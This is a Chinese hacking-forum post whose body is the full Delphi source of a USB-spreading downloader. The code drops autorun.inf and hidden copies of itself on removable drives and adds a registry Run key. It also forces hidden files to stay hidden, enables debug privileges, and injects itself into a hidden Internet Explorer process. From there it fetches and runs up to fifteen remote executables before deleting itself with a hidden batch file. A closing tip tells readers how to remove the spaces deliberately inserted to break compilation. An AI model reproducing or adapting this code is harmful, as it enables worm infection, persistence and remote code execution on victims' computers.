HanDs
NO.2

[Delphi文章] 一个含U盘感染的下载者代码 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

program AutoDown;
{$R  'ICON32.RES'  'ICON32.TXT' }
{$IMAGEBASE $17140000}
uses
  Windows, SysUtils, wininet, mmsystem, messages;

var
  htimer: integer;
  msg: tmsg;
  dw: bool;
  url1: pchar =
  ('http://www.xxx.com/xx.exe');
  url2: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url3: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url4: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url5: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url6: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url7: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url8: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url9: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url10: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url11: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url12: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url13: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url14: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url15: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');

  Downfile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved:
    LongWo rd; StatusCB: pointer): Longint; stdcall;
  hShell, hUrlmon: THandle;

  ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directo ry:
    PChar; ShowCmd: Integer): Cardinal; stdcall;

procedure RunInject(InjType: integer); stdcall; fo rward;
const
  ExeName = 'system.exe';
  faReadOnly = $00000001;
  faHidden = $00000002;
  faSysFile = $00000004;
  faVolumeID = $00000008;
  faDirecto ry = $00000010;
  faArchive = $00000020;
  faAnyFile = $0000003F;
  Lyint: array[0..9] of Char = ('0', '1', '2', '3', '4', '5', '6', '7', '8',
    '9');
  Lychr: array[0..25] of Char = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
    'j',
    'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
    'u', 'v', 'w', 'x', 'y', 'z');

var
  i, Len, infsize: integer;
  exefile, OpenPath, DriverList, TempFile: string;
  NoDel: integer;
  sa1, sa2, MyCurso r: THandle;

type
  TFileName = type string;
  TSearchRec = reco rd
    Time: Integer;
    Size: Integer;
    Attr: Integer;
    Name: TFileName;
    ExcludeAttr: Integer;
    FindHandle: THandle platfo rm;
    FindData: TWin32FindData platfo rm;
  end;

  LongRec = packed reco rd
    case Integer of
      0: (Lo, Hi: Wo rd);
      1: (Wo rds: array[0..1] of Wo rd);
      2: (Bytes: array[0..3] of Byte);
  end;

  {$R *.RES}

function FileExists(const FileName: string): Boolean;
var
  Handle: THandle;
  FindData: TWin32FindData;
begin
  Handle := FindFirstFileA(PChar(FileName), FindData);
  result := Handle <> INVALID_HANDLE_VALUE;
  if result then
  begin
    CloseHandle(Handle);
  end;
end;

function FindMatchingFile(var F: TSearchRec): Integer;
var
  LocalFileTime: TFileTime;
begin
  with F do
  begin
    while FindData.dwFileAttributes and ExcludeAttr <> 0 do
      if not FindNextFile(FindHandle, FindData) then
      begin
        Result := GetLastErro r;
        Exit;
      end;
    FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
    FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi,
      LongRec(Time).Lo);
    Size := FindData.nFileSizeLow;
    Attr := FindData.dwFileAttributes;
    Name := FindData.cFileName;
  end;
  Result := 0;
end;

procedure FindClose(var F: TSearchRec);
begin
  if F.FindHandle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(F.FindHandle);
    F.FindHandle := INVALID_HANDLE_VALUE;
  end;
end;

function FindFirst(const Path: string; Attr: Integer;
  var
  F: TSearchRec): Integer;
const
  faSpecial = faHidden o r faSysFile o r faVolumeID o r faDirecto ry;
begin
  F.ExcludeAttr := not Attr and faSpecial;
  F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
  if F.FindHandle <> INVALID_HANDLE_VALUE then
  begin
    Result := FindMatchingFile(F);
    if Result <> 0 then FindClose(F);
  end
  else
    Result := GetLastErro r;
end;

function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
  Result := 0;
  if not SetFileAttributes(PChar(FileName), Attr) then
    Result := GetLastErro r;
end;

function deletefile(const FileName: string): Integer;
begin
  Result := GetFileAttributes(PChar(FileName));
end;

 

function GetDirecto ry(dInt: integer): string;
var
  s: array[0..255] of Char;
begin
  case dInt of
    0: GetWindowsDirecto ry(@s, 256); //Windows安装文件夾所存在的路径
    1: GetSystemDirecto ry(@s, 256); //系统文件夾所存在的路径
    2: GetTempPath(256, @s); //Temp文件夾所存在的路径
  end;
  if dInt = 2 then
    result := string(s)
  else
    result := string(s) + '';
end;

function ExtractFilePath(FileName: string): string;
begin
  Result := '';
  while ((Pos('', FileName) <> 0) o r (Pos('/', FileName) <> 0)) do
  begin
    Result := Result + Copy(FileName, 1, 1);
    Delete(FileName, 1, 1);
  end;
end;

function ExtractFileName(FileName: string): string;
begin
  while Pos('', FileName) <> 0 do
    Delete(FileName, 1, Pos('', FileName));
  while Pos('/', FileName) <> 0 do
    Delete(FileName, 1, Pos('/', FileName));
  Result := FileName;
end;

function SetRegValue(key: Hkey; subkey, name, value: string): boolean;
var
  regkey: hkey;
begin
  result := false;
  RegCreateKey(key, PChar(subkey), regkey);
  if RegSetValueEx(regkey, Pchar(name), 0, REG_EXPAND_SZ, pchar(value),
    length(value)) = 0 then
    result := true;
  RegCloseKey(regkey);
end;

function CompareText(const S1, S2: string): Integer; assembler;
asm
        PUSH    ESI
        PUSH    EDI
        PUSH    EBX
        MOV    ESI,EAX
        MOV    EDI,EDX
        o r      EAX,EAX
        JE      @@0
        MOV    EAX,[EAX-4]
@@0:    o r      EDX,EDX
        JE      @@1
        MOV    EDX,[EDX-4]
@@1:    MOV    ECX,EAX
        CMP    ECX,EDX
        JBE    @@2
        MOV    ECX,EDX
@@2:    CMP    ECX,ECX
@@3:    REPE    CMPSB
        JE      @@6
        MOV    BL,BYTE PTR [ESI-1]
        CMP    BL,'a'
        JB      @@4
        CMP    BL,'z'
        JA      @@4
        SUB    BL,20H
@@4:    MOV    BH,BYTE PTR [EDI-1]
        CMP    BH,'a'
        JB      @@5
        CMP    BH,'z'
        JA      @@5
        SUB    BH,20H
@@5:    CMP    BL,BH
        JE      @@3
        MOVZX  EAX,BL
        MOVZX  EDX,BH
@@6:    SUB    EAX,EDX
        POP    EBX
        POP    EDI
        POP    ESI
end;

procedure DelMe;
var
  BatchFile: TextFile;
  BatchFileName: string;
  ProcessInfo: TProcessInfo rmation;
  StartUpInfo: TStartupInfo;
begin
  BatchFileName := ExtractFilePath(GetDirecto ry(2)) + '~Lying.bAt';
  AssignFile(BatchFile, BatchFileName);
  Rewrite(BatchFile);
  Writeln(BatchFile, ':tRy');
  Writeln(BatchFile, 'DeL "' + ParamStr(0) + '" /a');
  Writeln(BatchFile, 'iF eXiSt "' + ParamStr(0) + '"' + ' gOtO tRy');
  Writeln(BatchFile, 'dEl %0 /A');
  CloseFile(BatchFile);
  SetFileAttributes(pchar(BatchFileName), FILE_ATTRIBUTE_HIDDEN +
    FILE_ATTRIBUTE_SYSTEM);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  if CreateProcess(nil, PChar(BatchFileName), nil, nil,
    False, IDLE_PRIo rITY_CLASS, nil, nil, StartUpInfo,
    ProcessInfo) then
  begin
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
  end;
end;

function GetDrives: string;
var
  DiskType: Wo rd;
  D: Char;
  Str: string;
  i: Integer;
begin
  fo r i := 1 to 25 do //遍历26个字母
  begin
    D := Chr(i + 65);
    Str := D + ':';
    DiskType := GetDriveType(PChar(Str)); //得到本地磁盘,网络磁盘和移动磁盘...
    if {(DiskType = DRIVE_FIXED) o r (DiskType = DRIVE_REMOTE) o r} (DiskType =
      DRIVE_REMOVABLE) then
      Result := Result + D;
  end;
end;

function SendMetoDriver(const DriveName: string): Boolean;
var
  InfFile, Mmfile: string;
  InfText: TextFile;
begin
  InfFile := DriveName + 'Auto run.inf';
  MmFile := DriveName + ExeName;
  if (not FileExists(InfFile))  then
  begin
    AssignFile(InfText, InfFile);
    try
      ReWrite(InfText);
      WriteLn(InfText, '[Auto run]');
      WriteLn(InfText, 'open=' + ExeName);
      WriteLn(InfText, 'shellexecute=' + ExeName);
      WriteLn(InfText, 'shellAutocommand=' + ExeName);
    finally
      CloseFile(InfText);
    end;
    SetFileAttributes(pchar(inffile), FILE_ATTRIBUTE_HIDDEN +
      FILE_ATTRIBUTE_SYSTEM);
  end;
  if (not FileExists(MmFile))  then
  begin
    CopyFile(pchar(ParamStr(0)), pchar(MmFile), false);
    SetFileAttributes(pchar(MmFile), FILE_ATTRIBUTE_HIDDEN +
      FILE_ATTRIBUTE_SYSTEM);
  end;
end;

function IsFileInUse(fName: string): boolean;
var
  HFileRes: HFILE;
begin
  Result := false;
  if not FileExists(fName) then
    exit;
  HFileRes := CreateFile(pchar(fName), GENERIC_READ o r GENERIC_WRITE,
    0 {this is the trick!}, nil, OPEN_EXISTING, FILE_ATTRIBUTE_No rMAL, 0);
  Result := (HFileRes = INVALID_HANDLE_VALUE);
  if not Result then
    CloseHandle(HFileRes);
end;
procedure dir;
begin
if not directo ryexists(pchar('C:Program FilesWindowsUpdate')) then
  try
    createdir(pchar('C:Program FilesWindowsUpdate'));
  except
  end;
        end;
procedure regme;
begin
  SetRegValue(HKEY_LOCAL_MACHINE,
    'SoftWareMicrosoftWindowsCurrentVersionpoliciesExplo rerRun', 'Lying', exefile); //自启动
  SetRegValue(HKEY_LOCAL_MACHINE,
    'SOFTWAREMicrosoftWindowsCurrentVersionExplo rerAdvancedFolderHiddenSHOWALL',
    'CheckedValue', '2'); //强制隐藏系统文件
end;

procedure infect();
var
  i, len: integer;
  driverlist: string;
begin
  DriverList := GetDrives;
  Len := Length(DriverList);
  fo r i := Len downto 1 do
    SendMetoDriver(DriverList[i] + ':');
end;

function GetOnlineStatus: Boolean;
var
  ConTypes: Integer;
begin
  ConTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN +
    INTERNET_CONNECTION_PROXY;
  if (InternetGetConnectedState(@ConTypes, 0) = False) then
    Result := False
  else
    Result := True;
end;
procedure GetDebugPrivs; //提升进程权限
var
  hToken: THandle;
  tkp: TTokenPrivileges;
  retval: dwo rd;
begin
  if (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES o r
    TOKEN_QUERY, hToken)) then
  begin
    LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid);
    tkp.PrivilegeCount := 1;
    tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
  end;
end;
procedure TimerProc(uID, uMsg, dwUser, dw1, dw2: DWo rD); stdcall;
//网络连接时启动各种功能和下载
begin
try
  infect;
  except
  end;
  if GetOnlineStatus and not dw then
  begin
    try
    GetDebugPrivs;
      RunInject(1); //1 注入iexplo re.exe
    except
    end;
    dw := true;
  end;

  //timeKillEvent(hTimer3);
end;

procedure infecttimer; stdcall;
begin
  //Messagebox(0,pchar(time1+' '+hostbc+' '+urlbc),'数据', MB_OK);
  hTimer := TimeSetEvent(6000, 0, TimerProc, 0, TIME_PERIODIC);
  while (GetMessage(Msg, 0, 0, 0)) do
    ;
end;

procedure AutoAndw0rM;
var
  tid: dwo rd;
begin
  dw := false;
  if pos('pagefile.pif', pchar(paramstr(0))) > 0 then exitprocess(0);
  CreateMutex(nil, TRUE, 'dx'); //TRUE 标明该进程拥有此 Mutex 对象
  if (GetLastErro r = ERRo r_ALREADY_EXISTS) then exit; //Mutex 对象是否存在
  dir;
  regme;  //加载注册表
  CreateThread(nil, 0, @infecttimer, nil, 0, TID);
  while (GetMessage(Msg, 0, 0, 0)) do
    ;
end;

procedure Download; //下载过程

begin
// dw := true; //下载了一次
  LoadLibrary('kernel32.dll');
  LoadLibrary('user32.dll');
  hShell := LoadLibrary('Shell32.dll');
  hUrlmon := LoadLibrary('urlmon.dll');
  @ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
  @Downfile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');

  {if not directo ryexists(pchar('C:Program FilesWindowsUpdate')) then
  try
    createdir(pchar('C:Program FilesWindowsUpdate'));
  except
  end;  }
  try
  Downfile(nil,pchar(url1),'C:Program FilesWindowsUpdate1.exe', 0, nil);
  ShellRun(0,'open','C:Program FilesWindowsUpdate1.exe',nil,nil,5);
  except
  end;

  {Downfile(nil, pchar('http://www.mybr.o rg/test/a.exe'),
    'C:Program FilesWindowsUpdate1.exe', 0, nil);
  ShellRun(0, 'open', 'C:Program FilesWindowsUpdate1.exe', nil, nil, 5);
  }
  try
    Downfile(nil, pchar(url2), 'C:Program FilesWindowsUpdate2.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate2.exe', nil, nil, 5);
  except
  end;

  try
    Downfile(nil, pchar(url3), 'C:Program FilesWindowsUpdate3.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate3.exe', nil, nil, 5);
  except
  end;

  try
    Downfile(nil, pchar(url4), 'C:Program FilesWindowsUpdate4.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate4.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url5), 'C:Program FilesWindowsUpdate5.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate5.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url6), 'C:Program FilesWindowsUpdate6.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate6.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url7), 'C:Program FilesWindowsUpdate7.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate7.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url8), 'C:Program FilesWindowsUpdate8.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate8.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url9), 'C:Program FilesWindowsUpdate9.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate9.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url10), 'C:Program FilesWindowsUpdate10.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate10.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url11), 'C:Program FilesWindowsUpdate11.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate11.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url12), 'C:Program FilesWindowsUpdate12.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate12.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url13), 'C:Program FilesWindowsUpdate13.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate13.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url14), 'C:Program FilesWindowsUpdate14.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate14.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url15), 'C:Program FilesWindowsUpdate15.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate15.exe', nil, nil, 5);
  except
  end;
  //ExitProcess(0);
end;

procedure Inject(ProcessHandle: longwo rd; EntryPoint: pointer); //注入
var
  Module, NewModule: Pointer;
  Size, BytesWritten, TID: longwo rd;
begin
  //这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
  Module := Pointer(GetModuleHandle(nil));
  //得到内存映像的长度
  Size := PImageOptionalHeader(Pointer(integer(Module) +
    PImageDosHeader(Module)._lfanew +
    SizeOf(dwo rd) + SizeOf(TImageFileHeader))).SizeOfImage;
  //在Exp进程的内存范围内分配一个足够长度的内存
  VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
  //确定起始基址和内存映像基址的位置
  NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT o r
    MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  //确定上面各项数据后,这里开始进行操作
  WriteProcessMemo ry(ProcessHandle, NewModule, Module, Size, BytesWritten);
  //建立远程线程,至此注入过程完成
  createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

procedure setme;
begin
  if (CompareText(ParamStr(0), Copy(ParamStr(0), 1, 3) + ExeName) = 0) and
    (CompareText(ExtractFileName(ParamStr(0)), exename) = 0) then
  begin
    sa1 := Findwindow('CabinetWClass', nil); //我的电脑
    if GetFo regroundwindow <> sa1 then exit;
    sa1 := findwindowex(sa1, 0, 'Wo rkerW', nil);
    sa1 := findwindowex(sa1, 0, 'ReBarWindow32', nil);
    sa1 := findwindowex(sa1, 0, 'ComboBoxEx32', nil);
    sa2 := findwindowex(sa1, 0, 'ToolbarWindow32', nil);
    sa1 := findwindowex(sa1, 0, 'ComboBox', nil);
    sa1 := findwindowex(sa1, 0, 'Edit', nil);
    OpenPath := Copy(ParamStr(0), 1, 3);
    SendMessage(sa1, WM_SETTEXT, length(OpenPath), longint(pchar(OpenPath)));
    SendMessage(sa2, WM_LBUTTONDOWN, 0, 0);
    SendMessage(sa2, WM_LBUTTONUP, 0, 0);
    SendMessage(sa1, WM_KILLFOCUS, 0, 0); //去掉焦点,避免怀疑...
    NoDel := 1;
  end;
  if IsFileInUse(exefile) = false then
  begin
    SetFileAttributes(pchar(exefile), 0);
    DeleteFile(pchar(exefile));
    Copyfile(pchar(ParamStr(0)), pchar(exefile), false);
    SetFileAttributes(pchar(exefile), FILE_ATTRIBUTE_HIDDEN +
      FILE_ATTRIBUTE_SYSTEM);
    winexec(pchar(exefile), sw_hide);
  end;
  //AutoAndw0rM;
  if (NoDel <> 1) then DelMe; //如果nodel这个变量<>1,就自删除
  ExitProcess(0);
end;

procedure RunInject(InjType: integer);
var
  ProcessHandle, PID: longwo rd;

begin
  if InjType = 0 then //注入explo rer.exe
  begin
    //获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
    GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
  end
  else //注入iexplo re.exe
  begin
    //createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
    winexec(PChar('C:Program FilesInternet Explo rerIEXPLo rE.EXE'), sw_hide);
    sleep(500);
    GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
    //打开进程
    ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
    Inject(ProcessHandle, @Download);
    //关闭对像
    CloseHandle(ProcessHandle);
    //sleep(500);
    //ExtDelMe;
  end;
end;

begin
  exefile := Pchar(GetDirecto ry(2) + ExeName);
  if CompareText(ParamStr(0), exefile) <> 0 then
    setme
  else
  begin
    AutoAndw0rM;
  // ExitProcess(0);
  end;
end.

调试的时候把o r中间的空格去掉


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
一个
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组